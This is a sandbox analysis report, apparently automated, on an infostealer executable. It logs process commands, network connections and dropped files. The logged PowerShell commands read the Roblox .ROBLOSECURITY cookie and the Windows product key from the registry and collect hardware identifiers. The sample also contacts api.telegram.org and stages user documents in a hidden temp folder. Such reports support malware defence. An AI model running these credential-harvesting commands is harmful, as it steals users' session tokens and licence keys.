C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8916.tmp" "c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb3491ab58,0x7ffb3491ab68,0x7ffb3491ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2184 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4344 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4460 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3356 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2808 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.178.4:443 www.google.com udp
GB 142.250.187.206:443 play.google.com udp
GB 172.217.16.238:443 consent.google.com udp
GB 172.217.16.238:443 consent.google.com tcp
N/A 224.0.0.251:5353 udp
GB 172.217.16.238:443 consent.google.com tcp
US 104.18.34.183:443 www.hybrid-analysis.com tcp
US 104.18.34.183:443 www.hybrid-analysis.com tcp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 23.53.113.19:443 assets.adobedtm.com tcp
US 95.100.133.209:443 use.typekit.net tcp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 209.133.100.95.in-addr.arpa udp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 95.100.133.199:443 p.typekit.net tcp
US 95.100.133.209:443 use.typekit.net tcp
US 172.64.155.119:443 privacyportal.onetrust.com tcp
IE 66.235.152.225:443 edge.adobedc.net tcp
IE 66.235.152.221:443 edge.adobedc.net tcp
IE 66.235.152.221:443 edge.adobedc.net tcp
IE 66.235.152.221:443 edge.adobedc.net tcp
GB 172.217.169.35:443 beacons.gcp.gvt2.com tcp
GB 142.250.178.4:443 www.google.com udp
GB 216.58.201.110:443 www.youtube.com udp
IE 66.235.152.221:443 edge.adobedc.net tcp
IE 66.235.152.221:443 edge.adobedc.net tcp
IE 66.235.152.221:443 edge.adobedc.net tcp
GB 142.250.178.4:443 www.google.com udp
GB 172.217.169.35:443 beacons.gcp.gvt2.com udp
GB 35.214.42.68:443 e2c41.gcp.gvt2.com tcp
GB 172.217.169.67:443 beacons.gvt2.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI26002\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI26002\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI26002\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI26002\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI26002\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI26002\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/1488-53-0x00007FFB26A63000-0x00007FFB26A65000-memory.dmp

memory/1488-54-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

memory/1488-55-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0vv2y2ww.gkv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1488-61-0x0000021D03B50000-0x0000021D03B72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc4dd6766dd68388d8733f1b729f87e9
SHA1 7b883d87afec5be3eff2088409cd1f57f877c756
SHA256 3407d8ad0c68a148aef81c7f124849573ac02097acd15f9bbe80f86e0498e826
SHA512 3084c1b7bb0fd998cddb8c917bac87f163a0f134a420158db4f354cb81ec1d5d65d3bac1d9b3e11b0a6707deacece47f819b1ed55ddf2b1d287fbdb244bf65a4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f69a8e8f957b75f734c60b74f9fe75c
SHA1 fcf4626d161e9d9203e8ce8f9b3c24d750709835
SHA256 d2970c2e2ac73b9a3ec70f2ff081a2ac595c6525d86671305b499c8cb0021dea
SHA512 dd5cdfa3935f70818603780cadbc0157ca142278907f0f91cefa8adba3a4d0616fbaeb3771208ff4962d114654b1b4fab27f080923e8bb623dc09e958d135bb1

memory/1488-147-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline

MD5 aa56a1669ab025b03faa4be71d5c230f
SHA1 04ef4f5ae83eacb67036609c44521f45e923b248
SHA256 c7ff4aa02a33fa4c8868ded6c68aaf137fe5fb68c21c7736b68b8258f8241c32
SHA512 63653216f4426cebb6ad862676fbaf0e0937ecf389645c83067663f80f8bb50dc31bbcf1f4584e6e4c120cf0a2c9b343f2fc95324232ca48c64bcea2a6535414

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP

MD5 41e918bfd31440ae4dea1596c29af95f
SHA1 a8367b173041fc54175e95691dcddd623affa674
SHA256 82c27b39d40d931a4f000a55240abf397ae83875ff46ea86ab0a9ff36c09be2f
SHA512 2aaae813d7d04b5efed6ff39bb65fedf2b95ef46b46d2a1275cff898182fde001deaf93a13d710c6ac88b752bd2d08f6a31a84f613b1f0988a98e266f796e836

C:\Users\Admin\AppData\Local\Temp\RES8916.tmp

MD5 c5cfdd26039e343417d80f7beeecea44
SHA1 c6c0f7c2b5c4e5cd52b4daf6f2bea7aa90c4512c
SHA256 ee189e39ecdca9e39e7d3f5aec7c188526ee3ccc335b278da13d64b53e7fb661
SHA512 e6c78bf597a0c370b6fb3f34d65e39f83d6229b083dd933ad79bd41568e47429edef6ebff5b33d2e3db968d6246b5f45aff95913e1aa841df6c4c759d9af9f9e

memory/2748-166-0x0000016AFE5E0000-0x0000016AFE5E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.dll

MD5 cb731908f89125bb1e9903c0df0550e0
SHA1 e5f334642193223b115f578eda6c15abd22d5040
SHA256 09c0e7fa16271ae6ed865a999218060d1661fe159daae53f887e6c2efa5fd886
SHA512 3885783bf1e8c809e659f24f5ca3516105a11f3a5da8edd751cc34a7dae72c19e734f9e3db3f9975bfe1fe2c0cffc381ce1f6ffefd12fce596e1524d2ffe856e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc7ef1c5ad99410b0df1205afd6c30c8
SHA1 d97fb084ac7afbe8a0fe1dfe0600b62d1bfbc040
SHA256 b1a4fd3e475a775a4a004a0a7eadcac0071fb823161cef420870f7699f0fe1fb
SHA512 b3f604f857492c0a7812b7dd483f7df559d5c459cc11cdf757a1d940ebecc88960e2398fdde3ab6cfb8e76a47bd17135ce15a1a20477f8c4ded1f39f49f0727c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0ac871344dc49ae49f13f0f88acb4868
SHA1 5a073862375c7e79255bb0eab32c635b57a77f98
SHA256 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512 ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Display (1).png

MD5 1706ebfc6d1f50f1c17a4d5771b52d47
SHA1 97943a59f3ef6315e33f0d6f5d68b94bbe8a87a5
SHA256 3cdcbcc8633cc982a16e5e1f0295ca20dbaab762dda41e4ccad3ae6247f6cf1f
SHA512 53d63ef78c4274586247927d4282dcbc941aade47b617f4613a81dc98edf5322027104dd8748b67f0082d4451cfebddc7bd673f44b4642e67efa52a81e9e2c17

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\UnpublishFind.csv

MD5 9617e30bf9f7c036dba4e8679aef51aa
SHA1 b6be1739a5b0ace996679a13a802ee7908d1a673
SHA256 94fdd91845526a0a7fa0ad8dd01ba1cdbb2d968c93bced5602be0a49d1a8aaf3
SHA512 19f3e025a530a8aeb7594ece00ff81b207c2c8dbb55fb52bca5f42e834de18da5130b462944ced4b43eb433ca6d9e5c7e36108b3e1ff3aad6011208bb3b96761

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Music\SyncRename.mp4

MD5 66c47a1078e90b5a0ea086390a63514c
SHA1 b55c330fb4ac218140fab37a4da39a644e8f821e
SHA256 181e10855a6c2bb55a30d8ee8793e4b092172fc0b1d3a1f2672fb16596f6df14
SHA512 cff760548f52507bca28d3ee53d948954948e9ae275642c25ba8b4b861f20f60c9bc0f59211a4b4fb7c8227393b64d7fdc1129266221c9b929f01db85f30496a

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Music\SuspendSet.txt

MD5 0779c6b2668c66303b811ea1230a0b61
SHA1 891cb97823e05db6dd434626b11a890564367a1e
SHA256 76d0a3df07587bf50c17eb6bf0ede39d3dd0456950e14a7659b058f59a3b70cd
SHA512 95a6e44574fc4605f8c956977c3c3dbf01fa56c2d79a7b843cce5aa31680d6a2b0ddbd1e07f185405452fac548fb290971db22fe696b6fc70568bcf0475e5c6b

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Music\PublishSkip.pdf

MD5 027cd83dab222d26a8ce85afa3919a3c
SHA1 edb8102f5e3ffcd9b05b55bc405249c006420e93
